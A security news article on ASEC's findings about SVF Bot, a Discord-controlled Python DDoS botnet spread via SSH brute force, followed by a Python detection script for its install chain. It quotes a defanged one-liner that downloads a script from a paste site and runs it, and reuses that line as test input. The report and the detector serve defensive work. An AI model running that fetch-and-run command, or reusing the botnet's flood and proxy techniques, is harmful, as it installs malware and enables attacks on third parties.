Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have identified a sophisticated campaign targeting poorly secured Linux servers through SSH brute force attacks, deploying a Python-based DDoS botnet called SVF Bot that leverages Discord as its command-and-control infrastructure.
Discord-Powered Botnet Architecture
The SVF Botnet represents a concerning evolution in DDoS attack methodology, utilizing legitimate platforms to evade detection.
Developed by the self-identified “SVF Team,” the malware is distributed as Python source code and establishes communication with threat actors through Discord servers using bot tokens for authentication.

Upon successful SSH compromise, the attackers deploy the malware with a one-line installation command that creates a Python virtual environment, installs the required dependencies, downloads the bot source as main.py, and runs it:
python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5
The malware’s architecture includes a server grouping mechanism, allowing threat actors to organize infected machines into clusters for coordinated attacks.
When executed, SVF Bot sends server identification information via Discord webhooks, enabling operators to manage multiple compromised systems simultaneously.
Advanced DDoS Capabilities and Proxy Integration
SVF Bot’s technical sophistication extends to its DDoS attack capabilities, supporting both Layer 4 UDP floods and Layer 7 HTTP floods with advanced evasion techniques.
The malware includes comprehensive command functionality, with $http, $customhttp, $udp, and $customudp commands for different attack vectors.
A particularly notable feature is the malware’s proxy integration system. Before launching HTTP flood attacks, SVF Bot scrapes proxy addresses from ten public sources, including sslproxies.org, free-proxy-list.net, and multiple GitHub repositories containing proxy lists.
The malware validates each proxy by attempting Google authentication before incorporating them into its attack infrastructure.
This proxy validation process ensures high-quality anonymization during attacks, making detection and attribution significantly more challenging for defenders.
During HTTP flood operations, the malware randomly selects validated proxies for each connection attempt, effectively distributing attack traffic across multiple IP addresses.
Security Implications and Defensive Measures
The SVF Botnet campaign highlights critical security gaps in Linux server management practices.
ASEC researchers emphasize that organizations must implement robust SSH security measures, including complex passwords, regular credential rotation, and system patching protocols.
Network administrators should deploy comprehensive firewall solutions to restrict unauthorized external access and maintain updated security software.
The malware’s exploitation of legitimate platforms, such as Discord, and public proxy services demonstrates the evolving sophistication of modern botnet operations, necessitating enhanced monitoring capabilities to detect anomalous network behavior patterns and unauthorized outbound connections to messaging platforms.
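One way to hunt for the installation chain quoted earlier in shell-history or process-audit records, as an added example that is not from ASEC or the original article: it scores each command line on the four behaviours in that command rather than on the exact URL, and accepts defanged text. The "host user: command" log format, the threshold of 3, and all function names are assumptions; only termbin.com and the sample command come from the article.

```python
import re

# Paste host seen in the article's command; extend with services abused in your environment.
PASTE_HOSTS = ("termbin.com",)
THRESHOLD = 3  # assumed cut-off: each behaviour is common on its own
SIGNALS = {
    "venv_created": re.compile(r"\bpython[\d.]*\s+-m\s+venv\b"),
    "discord_libs": re.compile(r"\bpip[\d.]*\s+install\b[^;&|]*\bdiscord\b"),
    "paste_download": re.compile(
        r"\b(?:wget|curl)\b[^;&|]*https?://(?:%s)/" % "|".join(map(re.escape, PASTE_HOSTS))),
}
FETCH_TO_PY = re.compile(r"\b(?:wget\b[^;&|]*\s-O|curl\b[^;&|]*\s-o)\s+(\S+\.py)\b")

def refang(text):
    """Undo the defanging used in reports (hxxps, [.]) so one pattern set covers both."""
    return text.replace("hxxp", "http").replace("[.]", ".")

def fetched_script_executed(cmd):
    """True when a .py file written by wget/curl is run later in the same command line."""
    m = FETCH_TO_PY.search(cmd)
    if not m:
        return False
    run = r"\bpython[\d.]*\s+(?:\./)?" + re.escape(m.group(1)) + r"(?!\S)"
    return re.search(run, cmd[m.end():]) is not None

def score_command(cmd):
    """Return the names of the install-chain behaviours present in one command line."""
    cmd = refang(cmd)
    hits = [name for name, rx in SIGNALS.items() if rx.search(cmd)]
    if fetched_script_executed(cmd):
        hits.append("runs_fetched_py")
    return hits

def hunt(lines):
    """Parse 'host user: command' lines (assumed format); keep those at or over THRESHOLD."""
    scored = ((src, score_command(cmd)) for src, _, cmd in (l.partition(": ") for l in lines))
    return [(src, hits) for src, hits in scored if len(hits) >= THRESHOLD]

# Constructed sample input; the second line is the command quoted in the article, still defanged.
SAMPLE_LINES = [
    "build01 dev: python3 -m venv venv; source venv/bin/activate; pip install discord.py",
    "web01 root: python -m venv venv; source ./venv/bin/activate; "
    "pip install discord discord.py requests aiohttp lxml; "
    "wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5",
    "web02 ops: wget https://example.org/release.tar.gz -O release.tar.gz",
]

if __name__ == "__main__":
    for source, hits in hunt(SAMPLE_LINES):
        print(source, hits)
```

The first sample line, a developer setting up a Discord bot, matches two behaviours and stays under the threshold; only the full chain on web01 is reported.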





